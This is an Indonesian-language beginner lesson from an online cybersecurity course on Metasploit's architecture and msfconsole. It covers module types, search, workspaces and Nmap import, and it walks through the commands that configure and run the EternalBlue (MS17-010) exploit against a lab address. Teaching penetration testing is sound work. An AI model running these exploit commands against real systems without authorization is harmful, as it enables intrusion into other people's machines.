Cyber Security Academy · Pelajaran

Arsitektur Metasploit dan msfconsole

Pelajari navigasi msfconsole, struktur eksploitasi, muatan, dan modul, serta cara mengonfigurasi opsi.

Pelajaran 1 dari 413 langkah

Arsitektur Metasploit dan msfconsole adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 1 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.

Apa itu Metasploit?

Metasploit Framework adalah platform pengujian penetrasi sumber terbuka yang menyediakan antarmuka terpadu untuk mengembangkan, menguji, dan menjalankan eksploitasi. Platform ini merupakan alat standar industri untuk eksploitasi yang diotorisasi di lingkungan laboratorium.

Komponen Metasploit

Komponen utama: msfconsole (CLI interaktif), msfvenom (pembangkit muatan), Metasploit DB (PostgreSQL untuk menyimpan host/sesi), dan Armitage (antarmuka GUI).

Memulai msfconsole

Jalankan msfconsole dan inisialisasi basis data. Prompt berubah menjadi msf6 >. Pelengkapan tab berfungsi pada semua perintah, nama modul, dan opsi.

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

Jenis Modul

Metasploit mengatur kapabilitas ke dalam beberapa jenis modul: eksploitasi (kode serangan khusus kerentanan), muatan (kode yang berjalan setelah eksploitasi), tambahan (pemindai/pengacak masukan), pascaeksploitasi, pengode, dan nop.

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

Mencari Modul

Perintah search memfilter modul berdasarkan nama, CVE, platform, atau peringkat. Peringkat modul menunjukkan keandalannya: Excellent > Great > Good > Normal > Average > Low.

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

Menggunakan Modul Eksploitasi

Pilih modul dengan use, lihat opsi yang diperlukan dengan show options, tetapkan nilai dengan set, lalu jalankan dengan run atau exploit.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Menetapkan Opsi Global

setg menetapkan opsi secara global untuk semua modul berikutnya — berguna untuk LHOST, LPORT, dan RHOSTS yang tetap sama selama seluruh pelaksanaan pengujian.

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Modul Tambahan

Modul tambahan melakukan pemindaian, enumerasi, dan pengujian dengan masukan acak tanpa mengirimkan muatan. Contoh: pemindai versi SMB, pemaksaan brute force login SSH, dan pemindai direktori HTTP.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

Pengelolaan Ruang Kerja

Ruang kerja mengatur data pemindaian dan sesi untuk setiap pelaksanaan pengujian. Buat ruang kerja baru di awal setiap penilaian agar data tetap terpisah.

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Integrasi Nmap

Impor hasil pemindaian XML Nmap langsung ke basis data Metasploit untuk mengisi tabel host dan layanan, sehingga pemilihan modul yang terarah dapat dilakukan.

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

Bantuan dan Dokumentasi

Setiap modul memiliki dokumentasi bawaan. Gunakan info untuk membaca deskripsi modul, peringkat keandalan, referensi (CVE, advisori), dan opsi yang diperlukan.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

Pemeriksaan Singkat

Perintah apa yang digunakan untuk memilih modul di msfconsole?

Ringkasan: Arsitektur Metasploit

msfconsole adalah pusat utama: cari modul, tetapkan opsi, jalankan eksploitasi, dan kelola sesi. Selalu bekerja dalam ruang kerja bernama, impor hasil Nmap untuk mengisi basis data, dan baca informasi modul sebelum menjalankan apa pun — pahami apa yang Anda jalankan dan alasannya.

Gratis untuk memulai

Belajar Cyber Security Academy dengan tutor AI — gratis

Tulis dan jalankan kode asli di browser kamu, dapatkan bantuan instan dari tutor AI 24/7, dan lanjutkan di mana kamu tinggalkan di web atau aplikasi.

Kursus
76
Pelajaran
303

Pertanyaan yang Sering Diajukan

Apakah pelajaran “Arsitektur Metasploit dan msfconsole” gratis?

Ya — teks lengkap “Arsitektur Metasploit dan msfconsole” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.

Apa yang akan aku pelajari di “Arsitektur Metasploit dan msfconsole”?

Pelajari navigasi msfconsole, struktur eksploitasi, muatan, dan modul, serta cara mengonfigurasi opsi. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.

Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?

Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 1 dari 4.

Berapa lama pelajaran “Arsitektur Metasploit dan msfconsole” memakan waktu?

Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.

Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?

Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.

Semua pelajaran dalam kursus ini

  1. Arsitektur Metasploit dan msfconsole
  2. Mengeksploitasi Kerentanan yang Diketahui
  3. Muatan: Bertahap vs Tanpa Tahap, Meterpreter
  4. Pascaeksploitasi: Pivot dan Persistensi
← Kembali ke Cyber Security Academy